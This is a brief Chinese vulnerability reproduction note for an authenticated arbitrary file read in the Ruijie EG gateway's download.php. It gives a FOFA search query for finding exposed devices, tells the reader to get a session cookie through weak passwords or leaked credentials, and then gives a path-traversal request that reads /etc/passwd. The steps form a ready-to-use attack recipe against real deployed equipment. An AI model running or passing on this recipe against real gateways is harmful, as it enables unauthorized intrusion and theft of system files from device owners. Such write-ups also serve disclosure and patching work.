# 锐捷EG易网关download.php后台任意文件读取漏洞
**一、漏洞简介**
锐捷EG易网关download.php后台任意文件读取漏洞
**二、影响版本**
锐捷 EG易网关
**三、资产测绘**
●登录页面
fofa:`app="Ruijie-EG易网关" `


**四、漏洞复现**
1通过弱口令或账号密码泄露漏洞登录后台获取cookie

2通过上一步获取的cookie执行
```plain
/download.php?a=read_txt&file=../../../../etc/passwd
```

> 更新: 2024-06-24 11:42:26
> 原文: